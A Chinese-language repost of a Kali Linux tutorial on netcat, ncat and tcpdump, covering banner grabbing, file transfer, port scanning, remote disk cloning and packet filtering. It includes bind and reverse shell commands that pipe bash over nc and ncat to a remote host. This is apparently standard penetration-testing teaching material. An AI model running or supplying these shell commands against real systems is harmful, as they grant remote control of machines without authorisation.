IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 系统运维 -> kali NETCAT NC的使用 -> 正文阅读

[系统运维]kali NETCAT NC的使用

文章目录

nc的常用选项

-l 开启监听模式,用于入站链接
-p 开放本地端口
-n 远程连接,后面要跟上端口
-v 显示详细信息
-q 执行操作后退出,可以添加延迟时间
-z 端口扫描
-u UDP模式
-c 添加使用权限

NC具有的常用功能

? 网络工具中的瑞?军?——小身材、大智慧
? 侦听模式 / 传输模式
? telnet / 获取banner信息
? 传输文本信息
? 传输文件/目录
? 加密传输文件
? 远程控制/木?
? 加密所有流量
? 流媒体服务器
? 远程克隆硬盘

telnet / 获取banner信息

nc –nv 1.1.1.1 110
nc –nv 1.1.1.1 25
作用:可以通过连接端口获取一些banner信息,确定服务器上开发的端口是不是此服务
例如:ssh服务工作端口是TCP 22

在这里插入图片描述
通过此图,用nc连接目标服务器22端口,不一定就是SSH服务
在这里插入图片描述
开放本地服务22端口,让服务器通过ssh连接,可以发现服务器上SSH服务的banene信息

传输文本信息

A:nc -lp 4444
B:nc –nv 1.1.1.1 4444
作用:服务器可以开放本地端口,让客户端来连接此端口用来做聊天工具
服务器

在这里插入图片描述
客户端
在这里插入图片描述

传输文件/目录

传输文件:
A:nc -lp 333 > 1.mp4
B: nc -nv 1.1.1.1 333 < 1.mp4 -q 1

A:nc -q 1 -lp 333 < a.mp4
B:nc -nv 1.1.1.1 333 > 2.mp4==
传输目录
A:tar -cvf - music/ | nc -lp 333 –q 1
B:nc -nv 1.1.1.1 333 | tar -xvf –==

加密传文件

A:nc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4
B: mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1

端口扫描

TCP扫描:
nc -nvz 1.1.1.1 1-65535==

在这里插入图片描述
UDP扫描:
nc –vnzu 1.1.1.1 1-1024

在这里插入图片描述
一般用NC使用UDP扫描准确度非常低,不建议用NC扫

远程克隆硬盘

A: nc -lp 333 | dd of=/dev/sda
B: dd if=/dev/sda | nc -nv 1.1.1.1 333 –q 1
远程电子取证,可以将目标服务器硬盘远程复制,或者内存

远程控制

正向控制:
A:nc -lp 333 -c bash
B:nc -nv 1.1.1.1 333==

反向控制:
A:nc -lp 333
B:nc -nv 1.1.1.1 333 -c bash

NCAT

NCAT比NC更具有安全性,支持加密和身份验证的能力,NC不支持。
ncat -c bash --allow 192.168.20.14 -vnl 333 --ssl
(–allow 进行身份验证,–ssl进行加密算法)

在这里插入图片描述
ncat -nv 1.1.1.1 333 --ssl
在这里插入图片描述
通过wireshark抓包对?比nc、ncat加密与不加密的流量
nc
在这里插入图片描述NCAT在这里插入图片描述

TCPDUMP简单用法

No-GUI的抓包分析?工具
Linux、Unix系统默认安装
tcpdump -i eth0 -s 0 -w file.pcap
(-i选择网卡,-w保存格式,-n筛选条件,-r读取文件)

在这里插入图片描述
读取抓包文件
cpdump -r file.pcap
在这里插入图片描述
TCPDUMP——筛选
? tcpdump -n -r http.cap | awk ‘{print $3}’| sort –u
? tcpdump -n src host 145.254.160.237 -r http.cap
? tcpdump -n dst host 145.254.160.237 -r http.cap
? tcpdump -n port 53 -r http.cap
? tcpdump -nX port 80 -r http.cap

  系统运维 最新文章
配置小型公司网络WLAN基本业务(AC通过三层
如何在交付运维过程中建立风险底线意识,提
快速传输大文件,怎么通过网络传大文件给对
从游戏服务端角度分析移动同步(状态同步)
MySQL使用MyCat实现分库分表
如何用DWDM射频光纤技术实现200公里外的站点
国内顺畅下载k8s.gcr.io的镜像
自动化测试appium
ctfshow ssrf
Linux操作系统学习之实用指令(Centos7/8均
上一篇文章      下一篇文章      查看所有文章
加:2021-10-12 23:53:40  更:2021-10-12 23:54:37 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/15 18:34:22-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码